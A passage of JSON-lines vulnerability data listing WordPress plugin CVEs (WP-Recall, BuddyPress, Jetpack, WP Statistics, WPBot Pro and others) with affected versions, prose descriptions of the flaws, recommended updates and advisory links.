version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3250094\\\/wp-recall\\\/trunk\\\/add-on\\\/publicpost\\\/shortcodes.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3250094\\\/wp-recall\\\/trunk\\\/add-on\\\/publicpost\\\/shortcodes.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3e0be093-d61a-4634-ba9b-91dd7328e8cd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3e0be093-d61a-4634-ba9b-91dd7328e8cd?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1323","slug":"wp-recall","versionImpact":"16.26.10","versionEndExcluding":"16.26.12","description":"The WP-Recall \u2013 Registration, Profile, Commerce & More plugin for WordPress is vulnerable to SQL Injection via the 'databeat' parameter in all versions up to, and including, 16.26.10 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 16.26.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3250094\\\/wp-recall\\\/trunk\\\/add-on\\\/rcl-chat\\\/core.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3250094\\\/wp-recall\\\/trunk\\\/add-on\\\/rcl-chat\\\/core.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ae5b4d81-c2f1-4d0d-b7b0-5556bf0451f5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ae5b4d81-c2f1-4d0d-b7b0-5556bf0451f5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1322","slug":"wp-recall","versionImpact":"16.26.10","versionEndExcluding":"16.26.12","description":"The WP-Recall \u2013 Registration, Profile, Commerce & More plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 16.26.10 via the 'feed' shortcode due to insufficient restrictions on which posts can be included. This makes it possible for unauthenticated attackers to view data from password protected, private, or draft posts that they should not have access to.","recommendation":"Update to version 16.26.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3250094\\\/wp-recall\\\/trunk\\\/add-on\\\/rcl-chat\\\/core.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3250094\\\/wp-recall\\\/trunk\\\/add-on\\\/rcl-chat\\\/core.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c667be65-e6d3-40e1-aeec-384d309fde3d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c667be65-e6d3-40e1-aeec-384d309fde3d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9771","slug":"wp-recall","versionImpact":"16.26.11","versionEndExcluding":"16.26.12","description":"The WP-Recall  WordPress plugin before 16.26.12 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 16.26.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c33adc08-99c5-42e1-a2e3-e7c3412a6a3f\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c33adc08-99c5-42e1-a2e3-e7c3412a6a3f\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4496","slug":"miniorange-saml-20-single-sign-on","versionEndExcluding":"16.0.8","description":"The SAML SSO Standard WordPress plugin version 16.0.0 before 16.0.8, SAML SSO Premium WordPress plugin version 12.0.0 before 12.1.0 and SAML SSO Premium Multisite WordPress plugin version 20.0.0 before 20.0.7 does not validate that the redirect parameter to its SSO login endpoint points to an internal site URL, making it vulnerable to an Open Redirect issue when the user is already logged in.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/be21f355-0e5b-4ad7-9d8f-85e9a0101ddc\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/be21f355-0e5b-4ad7-9d8f-85e9a0101ddc\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e6c4c8c7-1dcd-45bf-8582-f12accca6fac\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e6c4c8c7-1dcd-45bf-8582-f12accca6fac\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/af2e30c7-0787-4fe2-97ee-bc616f7178a1\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/af2e30c7-0787-4fe2-97ee-bc616f7178a1\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11109","slug":"wp-google-places-review-slider","versionImpact":"15.5","versionEndExcluding":"15.6","description":"The WP Google Review Slider WordPress plugin before 15.6 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 15.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/93619da1-a8d6-43b6-b1be-8d50ab6f29f7\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/93619da1-a8d6-43b6-b1be-8d50ab6f29f7\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6693","slug":"wccp-pro","versionImpact":"15.0","versionEndExcluding":"15.3","description":"The wccp-pro WordPress plugin before 15.3 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 15.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2b1af7eb-452a-43f4-aae9-edd8e7312fe8\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2b1af7eb-452a-43f4-aae9-edd8e7312fe8\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6690","slug":"wccp-pro","versionImpact":"15.0","versionEndExcluding":"15.3","description":"The wccp-pro WordPress plugin before 15.3 contains an open-redirect flaw via the referrer parameter, allowing redirection of users to external sites","recommendation":"Update to version 15.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/09c6848d-30dc-4382-ae74-b470f586e142\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/09c6848d-30dc-4382-ae74-b470f586e142\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-52728","slug":"responsive-posts-carousel-pro","versionImpact":"15.0","versionEndExcluding":"15.1","description":"Improper Control of Filename for Include\/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in WebCodingPlace Responsive Posts Carousel WordPress Plugin allows PHP Local File Inclusion. This issue affects Responsive Posts Carousel WordPress Plugin: from n\/a through 15.0.","recommendation":"Update to version 15.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/responsive-posts-carousel-pro\\\/vulnerability\\\/wordpress-responsive-posts-carousel-wordpress-plugin-plugin-15-0-local-file-inclusion-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/responsive-posts-carousel-pro\\\/vulnerability\\\/wordpress-responsive-posts-carousel-wordpress-plugin-plugin-15-0-local-file-inclusion-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10011","slug":"buddypress","versionImpact":"14.1.0","versionEndExcluding":"14.2.1","description":"The BuddyPress plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 14.1.0 via the id parameter. This makes it possible for authenticated attackers, with Subscriber-level access and above, to perform actions on files outside of the originally intended directory and enables file uploads to directories outside of the web root. Depending on server configuration it may be possible to upload files with double extensions. This vulnerability only affects Windows.","recommendation":"Update to version 14.2.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4327f414-64f4-4193-a5c0-2a5ecdd75e11?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4327f414-64f4-4193-a5c0-2a5ecdd75e11?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/buddypress\\\/buddypress\\\/blob\\\/master\\\/src\\\/bp-core\\\/bp-core-avatars.php#L1370\",\"name\":\"https:\\\/\\\/github.com\\\/buddypress\\\/buddypress\\\/blob\\\/master\\\/src\\\/bp-core\\\/bp-core-avatars.php#L1370\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/buddypress\\\/buddypress\\\/blob\\\/master\\\/src\\\/bp-core\\\/bp-core-avatars.php#L1270\",\"name\":\"https:\\\/\\\/github.com\\\/buddypress\\\/buddypress\\\/blob\\\/master\\\/src\\\/bp-core\\\/bp-core-avatars.php#L1270\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codex.buddypress.org\\\/releases\\\/version-14-2-1\\\/\",\"name\":\"https:\\\/\\\/codex.buddypress.org\\\/releases\\\/version-14-2-1\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3173924\\\/buddypress\\\/trunk\\\/bp-core\\\/bp-core-avatars.php?contextall=1&old=3102524&old_path=%2Fbuddypress%2Ftrunk%2Fbp-core%2Fbp-core-avatars.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3173924\\\/buddypress\\\/trunk\\\/bp-core\\\/bp-core-avatars.php?contextall=1&old=3102524&old_path=%2Fbuddypress%2Ftrunk%2Fbp-core%2Fbp-core-avatars.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3953","slug":"wp-statistics","versionImpact":"14.13.3","versionEndExcluding":"14.13.4","description":"The WP Statistics \u2013 The Most Popular Privacy-Friendly Analytics Plugin plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'optionUpdater' function in all versions up to, and including, 14.13.3. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update arbitrary plugin settings.","recommendation":"Update to version 14.13.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-statistics\\\/tags\\\/14.13.2\\\/src\\\/Service\\\/Admin\\\/AjaxOptionUpdater.php#L33\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-statistics\\\/tags\\\/14.13.2\\\/src\\\/Service\\\/Admin\\\/AjaxOptionUpdater.php#L33\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3283791\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3283791\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/07f7ef07-0f14-4b74-8d47-d5dece4954b0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/07f7ef07-0f14-4b74-8d47-d5dece4954b0?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10858","slug":"jetpack","versionImpact":"14.0","versionEndExcluding":"14.1","description":"The Jetpack  WordPress plugin before 14.1 does not properly checks the postmessage origin in its 13.x versions, allowing it to be bypassed and leading to DOM-XSS. The issue only affects websites hosted on WordPress.com.","recommendation":"Update to version 14.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7fecba37-d718-4dd4-89f3-285fb36a4165\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7fecba37-d718-4dd4-89f3-285fb36a4165\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0955","slug":"wp-statistics","versionEndExcluding":"14.0","description":"The WP Statistics WordPress plugin before 14.0 does not escape a parameter, which could allow authenticated users to perform SQL Injection attacks. By default, the affected feature is available to users with the manage_options capability (admin+), however the plugin has a settings to allow low privilege users to access it as well.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/18b7e93f-b038-4f28-918b-4015d62f0eb8\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/18b7e93f-b038-4f28-918b-4015d62f0eb8\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10075","slug":"jetpack","versionImpact":"13.7","versionEndExcluding":"13.8","description":"The Jetpack  WordPress plugin before 13.8 does not ensure that the post created by the Contact Form is only accessible to authorised users, which could allow unauthenticated users to run arbitrary shortcodes and block.","recommendation":"Update to version 13.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a984976c-291a-4f68-90d4-e452605ea7d1\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a984976c-291a-4f68-90d4-e452605ea7d1\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3812","slug":"wpbot-pro","versionImpact":"13.6.2","versionEndExcluding":"13.7.0","description":"The WPBot Pro Wordpress Chatbot plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the qcld_openai_delete_training_file() function in all versions up to, and including, 13.6.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php).","recommendation":"Update to version 13.7.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8fe1609d-17d6-4afe-90b2-5473dc9b6c3b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8fe1609d-17d6-4afe-90b2-5473dc9b6c3b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wpbot.pro\\\/\",\"name\":\"https:\\\/\\\/www.wpbot.pro\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13091","slug":"wpbot-pro","versionImpact":"13.5.4","versionEndExcluding":"13.5.6","description":"The WPBot Pro Wordpress Chatbot plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'qcld_wpcfb_file_upload' function in all versions up to, and including, 13.5.4. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible. Note: The exploit requires thee ChatBot Conversational Forms plugin and the Conversational Form Builder Pro addon plugin.","recommendation":"Update to version 13.5.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0f9b6979-2662-4d2f-9656-b880dd80832c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0f9b6979-2662-4d2f-9656-b880dd80832c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wpbot.pro\\\/\",\"name\":\"https:\\\/\\\/www.wpbot.pro\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12879","slug":"wpbot-pro","versionImpact":"13.5.5","versionEndExcluding":"13.5.6","description":"The WPBot Pro Wordpress Chatbot plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'qc_wp_latest_update_check_pro' function in all versions up to, and including, 13.5.5. This makes it possible for authenticated attackers, with Subscriber-level access and above, to create Simple Text Responses to chat queries.","recommendation":"Update to version 13.5.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/91427e3e-fedb-407e-8af6-8f4411a4166a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/91427e3e-fedb-407e-8af6-8f4411a4166a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wpbot.pro\\\/\",\"name\":\"https:\\\/\\\/www.wpbot.pro\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5413","slug":"image-horizontal-reel-scroll-slideshow","versionImpact":"13.3","versionEndExcluding":"13.4","description":"The Image horizontal reel scroll slideshow plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'ihrss-gallery' shortcode in versions up to, and including, 13.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 13.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/28ba6f91-c696-4019-ae87-28ebfbe464cf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/28ba6f91-c696-4019-ae87-28ebfbe464cf?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/image-horizontal-reel-scroll-slideshow\\\/trunk\\\/image-horizontal-reel-scroll-slideshow.php#L212\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/image-horizontal-reel-scroll-slideshow\\\/trunk\\\/image-horizontal-reel-scroll-slideshow.php#L212\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3010834\\\/image-horizontal-reel-scroll-slideshow\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3010834\\\/image-horizontal-reel-scroll-slideshow\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4392","slug":"jetpack","versionImpact":"13.3.1","versionEndExcluding":"13.4","description":"The Jetpack \u2013 WP Security, Backup, Speed, & Growth plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's wpvideo shortcode in all versions up to, and including, 13.3.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 13.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jetpack\\\/tags\\\/13.3.1\\\/modules\\\/videopress\\\/class.videopress-player.php#L335\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jetpack\\\/tags\\\/13.3.1\\\/modules\\\/videopress\\\/class.videopress-player.php#L335\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/11dceac7-7ff8-4384-9046-919c38947c32?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/11dceac7-7ff8-4384-9046-919c38947c32?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5412","slug":"image-horizontal-reel-scroll-slideshow","versionImpact":"13.2","versionEndExcluding":"13.3","description":"The Image horizontal reel scroll slideshow plugin for WordPress is vulnerable to SQL Injection via the plugin's shortcode in versions up to, and including, 13.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers with subscriber-level and above permissions to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 13.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/08fb698f-c87c-4200-85fe-3fe72745633e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/08fb698f-c87c-4200-85fe-3fe72745633e?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/image-horizontal-reel-scroll-slideshow\\\/trunk\\\/image-horizontal-reel-scroll-slideshow.php?rev=2827121#L176\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/image-horizontal-reel-scroll-slideshow\\\/trunk\\\/image-horizontal-reel-scroll-slideshow.php?rev=2827121#L176\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2985331\\\/image-horizontal-reel-scroll-slideshow#file1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2985331\\\/image-horizontal-reel-scroll-slideshow#file1\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13355","slug":"admin-and-client-message-after-order-for-woocommerce","versionImpact":"13.2","versionEndExcluding":"13.3","description":"The Admin and Customer Messages After Order for WooCommerce: OrderConvo plugin for WordPress is vulnerable to limited file uploads due to insufficient file type validation in the upload_file() function in all versions up to, and including, 13.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to upload files on the affected site's server which may make remote code execution possible and is confirmed to make Cross-Site Scripting possible.","recommendation":"Update to version 13.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3222601%40admin-and-client-message-after-order-for-woocommerce&new=3222601%40admin-and-client-message-after-order-for-woocommerce&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3222601%40admin-and-client-message-after-order-for-woocommerce&new=3222601%40admin-and-client-message-after-order-for-woocommerce&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/82cee07d-871a-4579-aa53-ca0d14315458?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/82cee07d-871a-4579-aa53-ca0d14315458?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4230","slug":"wp-statistics","versionEndExcluding":"13.2.9","description":"The WP Statistics WordPress plugin before 13.2.9 does not escape a parameter, which could allow authenticated users to perform SQL Injection attacks. By default, the affected feature is available to users with the manage_options capability (admin+), however the plugin has a settings to allow low privilege users to access it as well.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a0e40cfd-b217-481c-8fc4-027a0a023312\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a0e40cfd-b217-481c-8fc4-027a0a023312\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5434","slug":"superb-slideshow-gallery","versionImpact":"13.1","versionEndExcluding":"13.2","description":"The Superb slideshow gallery plugin for WordPress is vulnerable to SQL Injection via the plugin's shortcode in versions up to, and including, 13.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers with subscriber-level and above permissions to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 13.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2985501\\\/superb-slideshow-gallery#file2\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2985501\\\/superb-slideshow-gallery#file2\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/superb-slideshow-gallery\\\/trunk\\\/superb-slideshow-gallery.php?rev=2827170#L127\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/superb-slideshow-gallery\\\/trunk\\\/superb-slideshow-gallery.php?rev=2827170#L127\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3a12945d-a67c-4a19-a4e7-f65f5f2a21bb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3a12945d-a67c-4a19-a4e7-f65f5f2a21bb?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6456","slug":"wp-facebook-reviews","versionImpact":"12.8","versionEndExcluding":"13.0","description":"The WP Review Slider WordPress plugin before 13.0 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 13.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/30f31412-8f94-4d5e-a080-3f6f669703cd\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/30f31412-8f94-4d5e-a080-3f6f669703cd\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2942","slug":"order-delivery-date","versionEndExcluding":"12.6.0","description":"The Order Delivery Date WordPress plugin before 12.6.0 discloses arbitrary post title (such as from draft and private posts) via an unauthenticated AJAX action, allowing attackers to retrieve such information","recommendation":"Update to version 12.6.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/13a87567-2cf7-4bfb-8d63-a8e74950978f\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/13a87567-2cf7-4bfb-8d63-a8e74950978f\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4892","slug":"buddypress","versionImpact":"12.5.0","versionEndExcluding":"12.5.1","description":"The BuddyPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018display_name\u2019 parameter in versions up to, and including, 12.4.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 12.5.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/113c154d-94a0-41da-a5ed-d9b2617e1c2c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/113c154d-94a0-41da-a5ed-d9b2617e1c2c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/buddypress\\\/tags\\\/12.4.1\\\/bp-members\\\/bp-members-blocks.php#L249\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/buddypress\\\/tags\\\/12.4.1\\\/bp-members\\\/bp-members-blocks.php#L249\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3100815\\\/buddypress\\\/trunk\\\/bp-members\\\/bp-members-blocks.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3100815\\\/buddypress\\\/trunk\\\/bp-members\\\/bp-members-blocks.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3974","slug":"buddypress","versionImpact":"12.4.0","versionEndExcluding":"12.4.1","description":"The BuddyPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018user_name\u2019 parameter in versions up to, and including, 12.4.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 12.4.1, or a newer patched 